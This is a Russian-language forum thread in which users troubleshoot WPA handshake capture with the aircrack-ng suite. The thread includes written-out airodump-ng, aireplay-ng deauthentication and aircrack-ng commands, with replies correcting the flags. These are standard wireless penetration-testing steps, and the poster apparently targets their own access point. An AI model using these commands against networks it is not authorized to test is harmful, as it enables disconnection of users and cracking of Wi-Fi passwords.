HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2022, 12:58
Hocuda
Новичок
Регистрация: 18.06.2022
Сообщений: 0
С нами: 2056273

Репутация: 0
По умолчанию

Все делаю по стандарту:

Код:
ifconfig
-проверяю все роутеры подключенные к устройству

Код:
airmon-ng check kill
-убиваю лишние процессы

Код:
airmon-ng start wlan1
-запускаю свой адаптер в режим монитора (адаптер - tp-link wn823n)

Код:
airodump-ng wlan1
-просматриваю все сети в радиусе (у меня интерфейс на wlan1mon не меняется)

Код:
airodump-ng --bssid MAC адрес роутера --channel 11 -w wifi wlan1
-сканирую конкретную сеть и жду перехват хендшейка (когда перехватит, напишет "WPA handshake - и MAC адрес роутера", насколько я помню), при этом в директории где я находился создается 5 файлов, один из них ".cap", где и будет хендшейк

Код:
aireplay-ng --deauth 20 -a MAC роутера -c MAC подключенного клиента wlan1
- и здесь должно посылаться 20 пакетов на деаутентификацию, но программа стопорится на 2-ом или 3-ем






, а на скрине вообще ни одного пакета не послала.
Ну и разумеется никакого хендшейка в файле ".cap" не будет, уже проверял, запуская aircrack-ng, он писал, что есть одна потенциальная цель, но нет EAPOL data и стопорился.

Ну и вот не знаю че делать

P.S. Сорян за шакальное качество скринов, просто телега сжимает.
 
Ответить с цитированием

  #2  
Старый 31.07.2022, 14:29
Rook
Новичок
Регистрация: 09.01.2019
Сообщений: 0
С нами: 3865302

Репутация: 0
По умолчанию

Цитата:

Hocuda сказал(а):

Все делаю по стандарту:

Код:
ifconfig
-проверяю все роутеры подключенные к устройству

Код:
airmon-ng check kill
-убиваю лишние процессы

Код:
airmon-ng start wlan1
-запускаю свой адаптер в режим монитора (адаптер - tp-link wn823n)

Код:
airodump-ng wlan1
-просматриваю все сети в радиусе (у меня интерфейс на wlan1mon не меняется)

Код:
airodump-ng --bssid MAC адрес роутера --channel 11 -w wifi wlan1
-сканирую конкретную сеть и жду перехват хендшейка (когда перехватит, напишет "WPA handshake - и MAC адрес роутера", насколько я помню), при этом в директории где я находился создается 5 файлов, один из них ".cap", где и будет хендшейк

Код:
aireplay-ng --deauth 20 -a MAC роутера -c MAC подключенного клиента wlan1
- и здесь должно посылаться 20 пакетов на деаутентификацию, но программа стопорится на 2-ом или 3-ем

, а на скрине вообще ни одного пакета не послала.
Ну и разумеется никакого хендшейка в файле ".cap" не будет, уже проверял, запуская aircrack-ng, он писал, что есть одна потенциальная цель, но нет EAPOL data и стопорился.

Ну и вот не знаю че делать

P.S. Сорян за шакальное качество скринов, просто телега сжимает.

Не подскажу точно по теме, но по советую wifite2.
Комбайн где собрано все хорошее для wifi
 
Ответить с цитированием

  #3  
Старый 31.07.2022, 23:03
jiltfi
Новичок
Регистрация: 21.01.2022
Сообщений: 0
С нами: 2270373

Репутация: 0
По умолчанию

Цитата:

Hocuda сказал(а):

Все делаю по стандарту:

Код:
ifconfig
-проверяю все роутеры подключенные к устройству

Код:
airmon-ng check kill
-убиваю лишние процессы

Код:
airmon-ng start wlan1
-запускаю свой адаптер в режим монитора (адаптер - tp-link wn823n)

Код:
airodump-ng wlan1
-просматриваю все сети в радиусе (у меня интерфейс на wlan1mon не меняется)

Код:
airodump-ng --bssid MAC адрес роутера --channel 11 -w wifi wlan1
-сканирую конкретную сеть и жду перехват хендшейка (когда перехватит, напишет "WPA handshake - и MAC адрес роутера", насколько я помню), при этом в директории где я находился создается 5 файлов, один из них ".cap", где и будет хендшейк

Код:
aireplay-ng --deauth 20 -a MAC роутера -c MAC подключенного клиента wlan1
- и здесь должно посылаться 20 пакетов на деаутентификацию, но программа стопорится на 2-ом или 3-ем

, а на скрине вообще ни одного пакета не послала.
Ну и разумеется никакого хендшейка в файле ".cap" не будет, уже проверял, запуская aircrack-ng, он писал, что есть одна потенциальная цель, но нет EAPOL data и стопорился.

Ну и вот не знаю че делать

P.S. Сорян за шакальное качество скринов, просто телега сжимает.

долго не мог понять что у тебя не так, в aireplay-ng под флагом -c тебе надо указать свой bssid, или вообще ничего не указывать, будет время, попробуй как я сказал
 
Ответить с цитированием

  #4  
Старый 01.08.2022, 23:12
Rukh
Новичок
Регистрация: 04.05.2022
Сообщений: 0
С нами: 2120805

Репутация: 0
По умолчанию

Код:
sudo airodump-ng --bssid 77:77:77:77:77:77 --channel 7 -w handshake --output-format pcap wlan1
Код:
sudo aireplay-ng --deauth 100 -a 77:77:77:77:77:77 -c 88:88:88:88:88:88 wlan1 или sudo aireplay-ng -0 100 -a 77:77:77:77:77:77 wlan1
Должно работать.
no EAPOL data - это значит у вас не захватился хендшейк в .cap, вот и всё

Что потыкать:
- обновите дистрибутив, такое впечатление, что он у вас года 2019ого
- добавьте
Код:
--ignore-negative-one
вместо канала
- Вы уверены, что у Вас верно указаны все mac ?
- отключите 5Gz диапозон
 
Ответить с цитированием

  #5  
Старый 02.08.2022, 17:27
Hocuda
Новичок
Регистрация: 18.06.2022
Сообщений: 0
С нами: 2056273

Репутация: 0
По умолчанию

Цитата:

jiltfi сказал(а):

долго не мог понять что у тебя не так, в aireplay-ng под флагом -c тебе надо указать свой bssid, или вообще ничего не указывать, будет время, попробуй как я сказал

А как узнать свой bssid? Это то, что пишет напротив etcher в ifconfig? И если да, то какой bssid указывать? От wlan1 или wlan0?
 
Ответить с цитированием

  #6  
Старый 02.08.2022, 17:46
Hocuda
Новичок
Регистрация: 18.06.2022
Сообщений: 0
С нами: 2056273

Репутация: 0
По умолчанию

Цитата:

jiltfi сказал(а):

долго не мог понять что у тебя не так, в aireplay-ng под флагом -c тебе надо указать свой bssid, или вообще ничего не указывать, будет время, попробуй как я сказал

Попробовал ничего не писать напротив -c :
 
Ответить с цитированием

  #7  
Старый 02.08.2022, 20:21
jiltfi
Новичок
Регистрация: 21.01.2022
Сообщений: 0
С нами: 2270373

Репутация: 0
По умолчанию

Цитата:

Hocuda сказал(а):

А как узнать свой bssid? Это то, что пишет напротив etcher в ifconfig? И если да, то какой bssid указывать? От wlan1 или wlan0?
Да, напротив ether, это твой мак адрес сетефой карты, а указывать надо тот которую используешь в команде, если прописываешь интерфейс wlan1, то и мак от wlan1
Цитата:

Hocuda сказал(а):

Попробовал ничего не писать напротив -c :
я имел ввиду вообще не использовать флаг с
 
Ответить с цитированием

  #8  
Старый 02.08.2022, 20:23
jiltfi
Новичок
Регистрация: 21.01.2022
Сообщений: 0
С нами: 2270373

Репутация: 0
По умолчанию

Цитата:

Hocuda сказал(а):

А как узнать свой bssid? Это то, что пишет напротив etcher в ifconfig? И если да, то какой bssid указывать? От wlan1 или wlan0?
ещё тебе скажу что в дальнейшем используй место ifconfig ip, т.к. ifconfig уже устаревает
 
Ответить с цитированием

  #9  
Старый 09.08.2022, 22:19
Hocuda
Новичок
Регистрация: 18.06.2022
Сообщений: 0
С нами: 2056273

Репутация: 0
По умолчанию

Цитата:

jiltfi сказал(а):

Да, напротив ether, это твой мак адрес сетефой карты, а указывать надо тот которую используешь в команде, если прописываешь интерфейс wlan1, то и мак от wlan1

я имел ввиду вообще не использовать флаг с

Я только что попробовал все способы, а именно: не писал -с, писал напротив -с свой bssid, писал напротив -с bssid подключенного устройства к точке доступа, и все разы посылались пакеты, не залипали на 3 или 4. Но хендшейк уже был перехвачен до посылания пакетов(я просто отвлекся и оставил сканирование сети), но когда я его начал брутить, то он выдал не тот пароль, который на моей точке. Я подумал, что мол может кали залагал, перезапустил машину, провел все операции снова, послал пакеты на деаунтефикацию, они все отправились, но хендшейк не перехватился. Я вообще хз че происходит...
 
Ответить с цитированием

  #10  
Старый 09.08.2022, 23:18
Hocuda
Новичок
Регистрация: 18.06.2022
Сообщений: 0
С нами: 2056273

Репутация: 0
По умолчанию

Цитата:

Hocuda сказал(а):

Я только что попробовал все способы, а именно: не писал -с, писал напротив -с свой bssid, писал напротив -с bssid подключенного устройства к точке доступа, и все разы посылались пакеты, не залипали на 3 или 4. Но хендшейк уже был перехвачен до посылания пакетов(я просто отвлекся и оставил сканирование сети), но когда я его начал брутить, то он выдал не тот пароль, который на моей точке. Я подумал, что мол может кали залагал, перезапустил машину, провел все операции снова, послал пакеты на деаунтефикацию, они все отправились, но хендшейк не перехватился. Я вообще хз че происходит...

Это вообще сюр. Я с компа на котором тоже есть кали проделал ту же операцию, и он тоже написал тот же неправильный пароль, что и писал ноут. Я перепроверил - пароль действительно не тот, адаптер тоже использовал один и тот же
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.